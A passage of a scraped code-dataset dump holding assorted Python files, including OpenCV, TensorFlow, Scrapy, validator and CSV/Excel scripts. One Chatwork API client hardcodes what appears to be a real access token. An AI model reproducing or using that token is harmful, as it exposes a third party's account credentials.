cv2.FastFeatureDetector_create(threshold=35)\n# fast.setNonmaxSuppression(False)\nkp = fast.detect(grayImg, None)\nimg2 = cv2.drawKeypoints(src, kp, None, (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\nprint('Threshold: ', fast.getThreshold())\nprint('nonmaxSuppression: ', fast.getNonmaxSuppression())\nprint('neighborhood: ', fast.getType())\nprint('Total Keypoints with nonmaxSuppression: ', len(kp))\n#\ncv2.imshow('fast_true', img2)\n#\n# fast.setNonmaxSuppression(False)\n# kp = fast.detect(grayImg, None)\n#\n# print('Total Keypoints without nonmaxSuppression: ', len(kp))\n#\n# img3 = cv2.drawKeypoints(src, kp, None, (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n# cv2.imshow('fast_false', img3)\n\ncv2.waitKey()","sub_path":"OpenCV/feature_fast.py","file_name":"feature_fast.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"598829641","text":"import nacl.bindings as nb\nimport random\nimport pandas as pd\nimport numpy as np\nimport math\n\ndef keygeneration(n, party_i):\n assert(party_i < n) ## Anton code\n pkey_list = []\n skey_list = []\n for i in range(n):\n if i == party_i:\n pkey_list.append(0)\n skey_list.append(0)\n else: \n pk, sk = nb.crypto_kx_keypair()\n pkey_list.append(pk)\n skey_list.append(sk)\n return pkey_list,skey_list \n\ndef keyexchange(n, party_i, my_pkey_list, my_skey_list, other_pkey_list):\n common_key_list = []\n for i in range(n):\n #Generate DH (common) keys \n if i == party_i:\n common_key_list.append(0)\n else:\n if i > party_i:\n common_key_raw, _ = nb.crypto_kx_client_session_keys(my_pkey_list[i], my_skey_list[i], other_pkey_list[i])\n else: \n _, common_key_raw = nb.crypto_kx_server_session_keys(my_pkey_list[i], my_skey_list[i], other_pkey_list[i])\n #Hash the common keys\n common_key = int.from_bytes(nb.crypto_hash_sha256(common_key_raw), byteorder='big')\n common_key_list.append(common_key)\n return common_key_list\n\n\n#PRG\n\ndef randomize( r, modulo, clientsign):\n # Call the double lenght pseudorsndom generator\n random.seed(r)\n rand = random.getrandbits(256*2)\n rand_b_raw = bin(rand)\n 
nr_zeros_append = 512 - (len(rand_b_raw) - 2) # pad to the generator's full 512-bit output\n rand_b = '0' * nr_zeros_append + rand_b_raw[2:]\n # Use first half to mask the inputs and second half as the next seed to the pseudorandom generator\n R = int(rand_b[0:256], 2)\n r = int(rand_b[256:] , 2)\n return r, R \n\n\ndef randomize_all(party_i, common_key_list, modulo):\n \n for i in range(len(common_key_list)):\n if i == party_i:\n continue\n clientsign = 1 if i > party_i else -1\n common_key_list[i], client = randomize( common_key_list[i], modulo, clientsign)\n \n return common_key_list, client","sub_path":"src/utils/diffie_hellman.py","file_name":"diffie_hellman.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"494320647","text":"import csv\n\ngas=[]\ndata_e=[\"value\",\"country_or_area\"]\nyear=\"2010\"\nwith open(\"greenhouse_gas_inventory_data_data.csv\") as csvFile:\n reader1 =csv.reader(csvFile)\n for row in reader1:\n if row[2] not in data_e and row[1] in year: \n gas.append([float(row[-2]), row[0]])\n gas.sort(reverse=True)\n\nprint(gas[:5])\n\n\n\n\npop=[]\nv=[\"--\",\"NA\"]\nco_e=[\"World\",\"Country\",\"Asia & Oceania\",\"Africa\",\"Europe\",\"Central & South America\", \"North America\",\"Eurasia\",\"Middle East\"]\n\n\nwith open(\"populationbycountry19802010millions.csv\") as csvFile:\n reader =csv.reader(csvFile)\n for row in reader:\n if row[-1] not in v and row[0] not in co_e:\n pop.append([float(row[-1]), row[0]])\n \n pop.sort(reverse=True)\n\n print(pop[:5])\n\n\n\n\n\n\n","sub_path":"fileReader.py","file_name":"fileReader.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"403649824","text":"#!/usr/bin/env python3\n\n# ------\n# Sum.py\n# ------\n\nfrom functools import reduce\nfrom operator import add\n\nimport sys\nimport time\n\ndef sum_while (a) :\n i = 0\n s = 0\n while i != len(a) :\n s += a[i]\n i += 1\n return s\n\ndef sum_for_range (a) :\n s = 0\n for i in range(len(a)) :\n s += a[i]\n return s\n\ndef sum_while_iter (a) :\n p = iter(a)\n s = 0\n try :\n while True :\n s += next(p)\n except StopIteration :\n pass\n return s\n\ndef sum_for_in (a) :\n s = 0\n for w in a :\n s += w\n return s\n\ndef sum_reduce_lambda (a) :\n return reduce(lambda x, y : x + y, a, 0)\n\ndef sum_reduce_operator (a) :\n return reduce(add, a, 0)\n\ndef test_1 (f, c) :\n assert f(c()) == 0\n assert f(c([2])) == 2\n assert f(c([2, 3])) == 5\n assert f(c([2, 3, 4])) == 9\n\ndef test_2 (f) :\n print(f.__name__)\n a = 500 * [1]\n b = time.clock()\n assert f(a) == 500\n e = time.clock()\n print(\"%5.3f\" % ((e - b) * 1000), \"milliseconds\")\n print()\n\nprint(\"Sum.py\")\nprint(sys.version)\nprint()\n\ntest_1(sum_while, list)\ntest_1(sum_while, tuple)\n#test_1(sum_while, set) # TypeError: 'set' object does not support indexing\n\ntest_1(sum_for_range, list)\ntest_1(sum_for_range, tuple)\n#test_1(sum_for_range, set) # TypeError: 'set' object does not support indexing\n\ntest_1(sum_while_iter, list)\ntest_1(sum_while_iter, tuple)\ntest_1(sum_while_iter, set)\n\ntest_1(sum_for_in, list)\ntest_1(sum_for_in, tuple)\ntest_1(sum_for_in, set)\n\ntest_1(sum_reduce_lambda, list)\ntest_1(sum_reduce_lambda, tuple)\ntest_1(sum_reduce_lambda, set)\n\ntest_1(sum_reduce_operator, list)\ntest_1(sum_reduce_operator, tuple)\ntest_1(sum_reduce_operator, set)\n\ntest_1(sum, list )\ntest_1(sum, tuple)\ntest_1(sum, 
set)\n\ntest_2(sum_while)\ntest_2(sum_for_range)\ntest_2(sum_while_iter,)\ntest_2(sum_for_in)\ntest_2(sum_reduce_lambda)\ntest_2(sum_reduce_operator)\ntest_2(sum)\n\nprint(\"Done.\")\n\n\"\"\"\nSum.py\n3.3.3 (default, Jan 19 2014, 09:53:07)\n[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.2.79)]\n\nsum_while\n0.206 milliseconds\n\nsum_for_range\n0.085 milliseconds\n\nsum_while_iter\n0.126 milliseconds\n\nsum_for_in\n0.053 milliseconds\n\nsum_reduce_lambda\n0.134 milliseconds\n\nsum_reduce_operator\n0.068 milliseconds\n\nsum\n0.013 milliseconds\n\nDone.\n\"\"\"\n","sub_path":"examples/Sum.py","file_name":"Sum.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"351660684","text":"import cv2\nimport os\nimport tensorflow as tf\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom PIL import Image\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\nmodel_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'models/ssd_mobilenet_v11_coco',\n 'frozen_inference_graph.pb')\nimages_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'images/')\nlabel_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'inference/ssd_mobilenet_v11_coco',\n 'label_map.pbtxt')\nnum_classes = 10\n\n\ndef get_images_list(path):\n return [f for f in listdir(path) if isfile(join(path, f))]\n\n\nif __name__ == \"__main__\":\n\n images = get_images_list(images_dir)\n\n detection_graph = tf.Graph()\n with detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(model_path, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n label_map = label_map_util.load_labelmap(label_path)\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=num_classes,\n use_display_name=True)\n category_index = label_map_util.create_category_index(categories)\n\n with tf.Session(graph=detection_graph) as sess:\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n\n for image_name in images:\n image = cv2.imread(images_dir + image_name)\n\n image_np = np.expand_dims(image, axis=0)\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np})\n image_np = np.squeeze(image_np, axis=0)\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n\n cv2.imshow('object_detection', image)\n # Exit Option\n if cv2.waitKey(0) & 0xFF == ord('q'):\n break\n","sub_path":"image_test_network.py","file_name":"image_test_network.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367917083","text":"import collections\nimport json\nimport boto3\nimport tempfile\nimport zipfile\nimport shutil\nimport string\nimport 
os\nimport subprocess\n\n_glue_client = boto3.client('glue', 'eu-west-1')\n_s3_client = boto3.client('s3')\n_s3_resource = boto3.resource('s3')\n\ndef _get_git_revision_hash():\n return subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode('utf-8').replace('\\n','')\n\ndef _get_git_revision_short_hash():\n return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).decode('utf-8').replace('\\n','')\n\n\n# https://gist.github.com/angstwad/bf22d1822c38a92ec0a9\ndef _dict_merge(dct, merge_dct):\n \"\"\" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of\n updating only top-level keys, dict_merge recurses down into dicts nested\n to an arbitrary depth, updating keys. The ``merge_dct`` is merged into\n ``dct``.\n :param dct: dict onto which the merge is executed\n :param merge_dct: dct merged into dct\n :return: None\n \"\"\"\n for k, v in merge_dct.items():\n if (k in dct and isinstance(dct[k], dict)\n and isinstance(merge_dct[k], collections.Mapping)):\n _dict_merge(dct[k], merge_dct[k])\n else:\n dct[k] = merge_dct[k]\n\n# Read json file\ndef read_json(filename) :\n with open(filename) as json_data:\n data = json.load(json_data)\n return data\n\n# Write json file\ndef write_json(data, filename) :\n with open(filename, 'w+') as outfile:\n json.dump(data, outfile, indent=4, separators=(',', ': '))\n\ndef _end_with_slash(string) :\n if string[-1] != '/' :\n return string + '/'\n else :\n return string\n\ndef _remove_final_slash(string) :\n if string[-1] == '/' :\n return string[:-1]\n else:\n return string\n\n# Used by both classes (Should move into another module)\ndef _validate_string(s, allowed_chars = \"_\") :\n if s != s.lower() :\n raise ValueError(\"string provided must be lowercase\")\n\n invalid_chars = string.punctuation\n\n for a in allowed_chars :\n invalid_chars = invalid_chars.replace(a, \"\")\n\n if any(char in invalid_chars for char in s) :\n raise ValueError(\"punctuation excluding ({}) is not allowed in string\".format(allowed_chars))\n\ndef _get_file_from_file_path(file_path) :\n return file_path.split('/')[-1]\n\ndef _unnest_github_zipfile_and_return_new_zip_path(zip_path):\n \"\"\"\n When we download a zipball from github like this one:\n https://github.com/moj-analytical-services/gluejobutils/archive/master.zip\n\n The python lib is nested in the directory like:\n gluejobutils-master/gluejobutils/py files\n\n The glue docs say that it will only work without this nesting:\n docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-libraries.html\n\n This function creates a new, unnested zip file, and returns the path to it\n\n \"\"\"\n\n original_file_name = os.path.basename(zip_path)\n original_dir = os.path.dirname(zip_path)\n new_file_name = original_file_name.replace(\".zip\", \"_new\")\n\n with tempfile.TemporaryDirectory() as td:\n myzip = zipfile.ZipFile(zip_path, 'r')\n myzip.extractall(td)\n nested_folder_to_unnest = os.listdir(td)[0]\n nested_path = os.path.join(td, nested_folder_to_unnest)\n output_path = os.path.join(original_dir, new_file_name)\n final_output_path = shutil.make_archive(output_path, 'zip', nested_path)\n\n return final_output_path\n","sub_path":"etl_manager/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"85425437","text":"#for loops\r\n#\r\n# l1 = [\"jack\", \"jill\", \"mark\", \"paul\"]\r\n#\r\n# for name in l1:\r\n# print(name)\r\n\r\n\r\n# l1 = [[\"jack\", 1], [\"jill\", 
2], [\"mark\", 7], [\"paul\", 9]]\r\n#\r\n# for name, wife in l1:\r\n# print(name, \"number of wives\", wife)\r\n#\r\n# d1 = dict(l1)\r\n# for name in d1:\r\n# print(name)\r\n# for name, wives in d1.items():\r\n# print(name, \"number of wives\", wives)\r\n\r\nl1 = [1, 2, \"jack\", \"jill\", 7, 11]\r\n\r\nfor item in l1:\r\n if str(item).isnumeric() and item > 6:\r\n print(item)\r\n\r\n\r\n","sub_path":"tut12.py","file_name":"tut12.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143856140","text":"#!/bin/python\n# Maze Escape Player, by Matthew Schieber\n# complete player, which employs the \"keep right hand on wall\" strategy\n# template for use on hackerrank.com/challenges/maze-escape\n\n\ndef move_me(board):\n \n m = len(board)\n n = len(board[0])\n posr = 1\n posc = 1\n \n # go to exit\n target = False\n for i in range(m):\n for j in range(n):\n if(board[i][j] == 'e'):\n target = True\n goal_x, goal_y = i, j\n \n if(target): \n if(posr > goal_x):\n print (\"UP\")\n elif(posr < goal_x):\n print (\"DOWN\")\n elif(posc > goal_y):\n print (\"LEFT\")\n elif(posc < goal_y):\n print (\"RIGHT\")\n\n else:\n #: #\n #: - b\n if(board[0][1] == \"#\" and board[1][0] == \"-\"):\n print (\"LEFT\")\n \n #: \n #: # b\n #: - \n elif(board[1][0] == \"#\" and board[2][1] == '-'):\n print (\"DOWN\")\n \n #: -\n #: b #\n #: \n elif(board[0][1] == '-' and board[1][2] == '#'):\n print (\"UP\")\n \n #: \n #: b -\n #: # \n elif(board[1][2] == '-'):\n print (\"RIGHT\")\n \n elif(board[1][0] == '-'):\n print (\"LEFT\")\n \n \n \n# Tail starts here\nif __name__ == \"__main__\":\n pos = [int(i) for i in input().strip().split()]\n board = [[j for j in input().strip()] for i in range(3)]\n move_me(board)\n","sub_path":"maze-escape/player_complete.py","file_name":"player_complete.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"404314042","text":"\"\"\"\nThis module is made to create validators in the field\n\"\"\"\nimport re\nimport warnings\nfrom datetime import datetime\nEmailRegex = r'[^@]+@[^@]+\\.[^@]+'\nUrlRegex = (\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' 
# optional port\n r'(?:/?|[/?]\S+)$')\nurl_regex = re.compile(UrlRegex, re.IGNORECASE)\nemail_reg = re.compile(EmailRegex, re.IGNORECASE)\n\ntry:\n from email_validator import validate_email,EmailNotValidError\nexcept ImportError as e:\n warnings.warn(\"Email Validator is not found. \"\n \"Please install it using \"\n \"pip3 install email_validator\")\n def validate_email(email):\n if not email_reg.match(email):\n raise Invalid(\"Email is not valid\")\n\nclass Invalid(ValueError):\n \"\"\"\n This exception is a general exception raised when data is invalid,\n not a valid type, etc.\n\n :param message: Message you want to print in error\n :param args: any\n :param kwargs: any\n :type message: str\n \"\"\"\n def __init__(self, message, *args, **kwargs):\n super(Invalid, self).__init__(message, *args, **kwargs)\n\n\nclass Validator(object):\n \"\"\"\n This is the core of each validator class\n\n :param message: Message to be raised when any invalidation occurs\n :type message: str\n \"\"\"\n\n def __init__(self, message=None):\n \"\"\"\n This is the basic Validator\n\n :param message: The message you want to get in template engine\n \"\"\"\n if message is not None:\n self.message = message\n\nclass Data(Validator):\n\n \"\"\"\n This is the Data field validator to check whether data\n is provided or not\n\n :param message: Message to be raised when any invalidation occurs\n :type message: str\n \"\"\"\n\n def __call__(self, obj, field):\n \"\"\"This is called with object and field\n of object\n\n Args:\n obj (dict): dict of enclosing field\n field : element of object\n\n Raises:\n Invalid: if data is not provided\n \"\"\"\n data = field.data\n if isinstance(data, str) or isinstance(data, int) or isinstance(data, float):\n self.data = str(field.data)\n if not self.data.strip():\n raise Invalid(\"data is not valid\")\n if isinstance(data, list) or isinstance(data, dict):\n self.data = field.data\n if not self.data:\n raise Invalid(\"data is not valid\")\n \n\nclass Length(Validator):\n \"\"\"\n This validator is used to check the minimum and maximum length of data\n This works with str, int and float, not with array length\n\n :param min_val: minimum length\n :param max_val: maximum length\n :param message: Message to be raised when any invalidation occurs\n :type message: str\n :type min_val: int\n :type max_val: int\n \"\"\"\n def __init__(self, min_val=-1, max_val=-1, message=None):\n \"\"\"Overriding Validator Base class\n \"\"\"\n super(Length,self).__init__(message)\n if min_val == -1 and max_val == -1:\n raise ValueError('Provide at least one of min_val or max_val')\n else:\n self.min_val = min_val\n self.max_val = max_val\n\n def __call__(self, obj, field):\n self.data = field.data\n if (isinstance(self.data, (str, int, float))):\n self.data = str(self.data).strip()\n else:\n raise Invalid(\"Not a valid type\")\n if (len(self.data) < self.min_val or \n self.max_val!=-1 and len(self.data) > self.max_val):\n raise Invalid(\"Length is not appropriate\")\n\n\nclass Email(Validator):\n\n \"\"\"\n The Email Validator is used to validate an email address using the python\n email_validator dependency; if that is not installed on the machine, it\n falls back to the standard regex above\n\n :param message: Message to be raised when any invalidation occurs\n :type message: str\n \"\"\"\n\n def __call__(self, obj, field):\n \"\"\"Called when used to validate this field\n\n Args:\n obj (dict): An object containing Validator\n field (dict): field of object\n \"\"\"\n self.data = field.data\n try:\n 
validate_email(self.data)\n except EmailNotValidError:\n raise Invalid(str(self.data) + \" is not valid\")\n\n\nclass URL(Validator):\n \"\"\"\n The URL validator is used to validate URLs. It does not inherit\n from the Regex class; this is a separate implementation\n\n :param message: Message to be raised when any invalidation occurs\n :type message: str\n \"\"\"\n\n def __call__(self, obj, field):\n \"\"\"A class to validate urls\n\n Args:\n obj (object): A dict containing Validator\n field (obj): field of object\n \"\"\"\n self.data = field.data\n if not url_regex.match(self.data):\n raise Invalid(\"Not a valid url\")\n\n\nclass EqualTo(Validator):\n \"\"\"\n The EqualTo Validator is used to check if data in our field is\n the same as another field's\n\n :param field: The other field; pass the whole Field\n :param message: Message to be raised when any invalidation occurs\n :type message: str\n :type field: Field class\n \"\"\"\n\n def __init__(self, field, message=None):\n super(EqualTo,self).__init__(message)\n self.other = field\n\n def __call__(self, obj, field):\n if hasattr(self.other, \"_data\"):\n other_data = self.other.data\n else:\n self.other(obj)\n other_data = self.other.data\n self.data = field.data\n if self.data != other_data:\n raise Invalid(\"Unequal Data\")\n\n\nclass Date(Validator):\n \"\"\"\n The date field validator is used to validate date field\n under specific range of min_date and max_date\n\n :param min_date: minimum date\n :param max_date: maximum date\n :param field_format: format of field\n :param message: message\n :type min_date: str of year-month-date\n :type max_date: str of year-month-date\n :type field_format: Field format %Y-%m-%d is default\n :type message: str\n \"\"\"\n\n def __init__(self, min_date= datetime.min, max_date= datetime.min,field_format=None, message=None ):\n \"\"\"\n Overriding Init\n \"\"\"\n if field_format is None:\n self.field_format = \"%Y-%m-%d\" # month is %m, not %M (minutes)\n else:\n self.field_format = field_format\n super(Date, self).__init__(message)\n if min_date == datetime.min and max_date == datetime.min:\n raise ValueError(\"Provide one of min_date or max_date\")\n else:\n self.min_date = self.givedatetime(self.field_format, min_date)\n self.max_date = self.givedatetime(self.field_format, max_date)\n\n def __call__(self, obj, field):\n \"\"\"\n call the validator just with object containing\n field and the field object\n\n :param obj: object containing field\n :param field: some field object which instantiate Field\n which is callable and raises Invalid error\n when validated\n :return:None\n \"\"\"\n self.data = field.data\n try:\n self.date = datetime.strptime(self.data, self.field_format)\n except ValueError as e:\n raise Invalid(e)\n\n if (self.date < self.min_date or\n self.max_date != datetime.min and self.date >= self.max_date):\n raise Invalid(\"date is not bounded\")\n\n @staticmethod\n def givedatetime(dateformat, date):\n if isinstance(date, datetime):\n return date\n try:\n dt = datetime.strptime(date, dateformat)\n return dt\n except ValueError as e:\n raise Invalid(\"cannot get the correct date format \"\n \"when setting the datetime value\")\n\n\nclass Regex(Validator):\n \"\"\"\n This is used to validate data in the format of a regex\n\n :param reg: regex\n :param message: Message to be raised when an error occurs\n :type message: str\n :type reg: str\n \"\"\"\n\n def __init__(self, reg, message=None):\n \"\"\"\n This is the regex class used to validate some field\n against a regex implementation;\n it will not raise an invalidation when the regex matches the\n field's 
data\n \n Args:\n reg (regex): Regex\n message (str, optional): Message you want on Error\n \"\"\"\n super(Regex,self).__init__(message)\n self.regex = re.compile(reg)\n\n def __call__(self, obj, field):\n self.data = field.data\n if not self.regex.match(self.data):\n raise Invalid(\"it does not match the valid pattern\")\n \nclass Right(Validator):\n \"\"\"\n This Validator is specific to boolean Field which validates that\n data is True only\n\n :param message: message to be raised when an error occurs\n :type message: str\n \"\"\"\n def __call__(self,obj,field):\n self.data = field.data\n if not isinstance(self.data, bool):\n raise Invalid(\"this field should contain \"\n \"only boolean type values\")\n\n if not self.data:\n raise Invalid(\"field is false\")\n\nclass Wrong(Validator):\n \"\"\"\n This Validator is specific to boolean Field which validates that\n data is False only\n\n :param message: message to be raised when an error occurs\n :type message: str\n \"\"\"\n\n def __call__(self,obj,field):\n self.data = field.data\n if not isinstance(self.data, bool):\n raise Invalid(\"this field should contain \"\n \"only boolean type values\")\n\n if self.data:\n raise Invalid(\"field is true\")","sub_path":"json_justify/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"105770162","text":"import urllib.request\nimport json\nimport pprint\n\n# API endpoint\nENDPOINT = \"https://api.chatwork.com/v2\"\n\n# API key\napikey = \"e1531a1547f378ae47ceb94c4a1ad151\"\n\n# Function that calls the Chatwork API\n# @params path (required): API path\n# @params data (optional): data to send\ndef api (path, data=None):\n # URL-encode the request data if present\n if data != None:\n data = urllib.parse.urlencode(data)\n data = data.encode('utf-8')\n # Attach the API key to the headers\n headers = {\"X-ChatWorkToken\": apikey}\n # Build and send the request\n req = urllib.request.Request(ENDPOINT + path, data=data, headers=headers)\n with urllib.request.urlopen(req) as res:\n # API result\n result = json.loads(res.read().decode(\"utf-8\"))\n # Response headers (contain the remaining rate limit, etc.)\n info = dict(res.info())\n return result, info\n\nif __name__ == '__main__':\n # Get My Status.\n mystatus, info = api(\"/my/status\")\n print(json.dumps(mystatus, indent=4))","sub_path":"ソース/get_mystatus.py","file_name":"get_mystatus.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"150209404","text":"import sys\r\nimport matplotlib.pyplot as plt\r\n\r\nsys.path.append('D:\\\\Analyses\\\\Long-Lived-pymc3\\\\TreeNob1875XDate')\r\nfrom GetParamStats import GetParamValues,GetNames\r\nfrom RunningQuantiles import pltRunningQuantile\r\nsys.path.append( '../') \r\nsys.path.append( '../../') \r\n\r\n\r\nfrom HistoByHalf import HistoByHalf\r\nCaseName='..\\\\NormRecruit.csv'\r\n\r\nnthin=1000\r\nburn=0\r\n\r\npname=GetNames(CaseName)\r\n\r\n\r\nfor p in pname:\r\n x=GetParamValues(CaseName, p,burn=burn,nthin=nthin)\r\n print (p,len(x))\r\n plt.close()\r\n HistoByHalf(plt,x, ParamName=p,LowCol='r',UppCol='b',alpha=0.25)\r\n if p[:7]=='Rel_Abu':\r\n plt.xlim(-.05,1.05)\r\n plt.xlabel('Number of Iterations')\r\n plt.ylabel('Confidence Bounds')\r\n fname='trace_'+p+'.png'\r\n plt.savefig(fname, 
format=\"png\")\r\n\r\n","sub_path":"ConstRecruitConstM/DemoConverge/Traces_NormRecruit.py","file_name":"Traces_NormRecruit.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"82576996","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom bs4 import BeautifulSoup as bs\nimport re\nfrom espn.items import MatchItem\n\n\nclass FixtureSpider(scrapy.Spider):\n name = \"fixture\"\n allowed_domains = [\"espnfc.com\"]\n #start_urls = (\n #'http://www.espnfc.com/',\n #)\n\n season = 2015\n FIXTURE_URL = \"http://www.espnfc.com/{type}/{name_en}/{id}/fixtures?leagueId=0&season={season}\"\n team_pat = re.compile(\"teamlogos/soccer/\\d+/(\\d+).png\")\n\n def start_requests(self):\n import dataset\n SERVER = self.settings.get(\"SERVER\")\n if SERVER:\n db = dataset.connect(SERVER)\n teams = db.query(\"select id, name_en, type from yt_team\")\n for team in teams:\n team[\"name_en\"] = team[\"name_en\"].encode(\"utf-8\")\n url = self.FIXTURE_URL.format(season=self.season, **team)\n yield scrapy.Request(url,\n meta={\"team\": team})\n\n def parse(self, response):\n for item in self.parse_fixture(response):\n yield item\n team = response.meta[\"team\"]\n seasons = response.xpath(\".//*[@id='club-season-dropdown']/select/option/@value\").extract()\n for season in seasons:\n url = self.FIXTURE_URL.format(season=season, **team)\n yield scrapy.Request(url,\n meta={\"team\": team})\n\n def parse_fixture(self, response):\n #team = response.meta[\"team\"]\n response = bs(response.body, [\"lxml\"])\n fixtures = response.find_all(\"a\", attrs={\"class\": \"score-list\"})\n for fixture in fixtures:\n espn_id = fixture.get(\"data-gameid\")\n date = fixture.find(\"div\", attrs={\"class\": \"headline\"}).text\n finish = fixture.find(\"div\", attrs={\"class\": \"status\"})\n if not finish:\n finish = 2\n else:\n finish = finish.text\n\n home_logo = fixture.find(\"div\", attrs={\"class\": \"score-home-team\"}).find(\"img\")\n matched = self.team_pat.search(home_logo.get(\"src\"))\n if matched:\n home_id = matched.group(1)\n else:\n home_id = home_logo.get(\"alt\")\n\n result = fixture.find(\"div\", attrs={\"class\": \"result\"})\n home_score = result.find(\"span\", attrs={\"class\": \"home-score\"}).text\n away_score = result.find(\"span\", attrs={\"class\": \"away-score\"}).text\n\n away_logo = fixture.find(\"div\", attrs={\"class\": \"score-away-team\"}).find(\"img\")\n matched = self.team_pat.search(away_logo.get(\"src\"))\n if matched:\n away_id = matched.group(1)\n else:\n away_id = away_logo.get(\"alt\")\n\n league_id = fixture.find(\"div\", attrs={\"class\": \"score-competition\"}).get(\"title\")\n\n match = MatchItem(home_id=home_id,\n away_id=away_id,\n date=date,\n league_id=league_id,\n home_score=home_score,\n away_score=away_score,\n finish=finish,\n espn_id=espn_id)\n yield match\n\n","sub_path":"espn/spiders/fixture.py","file_name":"fixture.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"298177793","text":"import xlwt\nimport xlrd\n\n# 用来获取本地 文件名\ndef file_name(file_dir):\n import os\n L = []\n for root, dirs, files in os.walk(file_dir):\n # print(root) #当前目录路径\n # print(dirs) #当前路径下所有子目录\n L.append(files) #当前路径下所有非目录子文件\n return L[0]\n\n# 得到表中所有文件名\ndef get_cars_name(path):\n car_info = xlrd.open_workbook(path)\n # 通过sheet索引获得sheet对象\n sheet0 = car_info.sheet_by_index(0)\n result = sheet0.col_values(0)[1:]\n 
return result\n\ndef filter(all_path, find_path):\n car_info = xlrd.open_workbook(all_path)\n # Get the sheet object by sheet index\n sheet0 = car_info.sheet_by_index(0)\n count = sheet0.nrows\n find_cars = file_name(find_path)\n L = []\n for item in find_cars:\n item = item.split(\"_\")[0]\n L.append(item)\n\n # Create a new workbook\n new_car_info = xlwt.Workbook(encoding='utf-8', style_compression=0)\n # Write to the new sheet\n sheet1 = new_car_info.add_sheet('Vehicle secondary analysis', cell_overwrite_ok=True)\n sheet1.write(0, 0, \"License plate\")\n sheet1.write(0, 1, \"Time\")\n sheet1.write(0, 2, \"Lane number\")\n sheet1.write(0, 3, \"Direction\")\n for i in range(1, count):\n car = sheet0.row_values(i)[0]\n # print(car)\n if car in L:\n print(\"Found: \" + car)\n sheet1.write(i, 0, sheet0.row_values(i)[0])\n sheet1.write(i, 1, sheet0.row_values(i)[1])\n sheet1.write(i, 2, sheet0.row_values(i)[2])\n sheet1.write(i, 3, sheet0.row_values(i)[3])\n sheet1.write(i, 4, sheet0.row_values(i)[4])\n\n else:\n print(\"NO\")\n new_car_info.save(r\"C:\\Users\\lsy\\Desktop\\kc\\fliter.xls\")\n\n\nall_path = r\"C:\\Users\\lsy\\Desktop\\kc\\pic.xls\"\nfind_path = r\"C:\\Users\\lsy\\Desktop\\kc\\pic\"\n\nall_cars = get_cars_name(all_path)\nfilter(all_path, find_path)\n\n","sub_path":"python/filter_excle.py","file_name":"filter_excle.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"369934367","text":"import os, random, shutil\n# from shutil import copyfile\nfrom IPython import embed\n\n# You only need to change this line to your dataset download path\nsrc_path = '../train'\n\nif not os.path.isdir(src_path):\n print('please change the src_path')\n\ndst_ds_path = './datasets/pclreid'\nif not 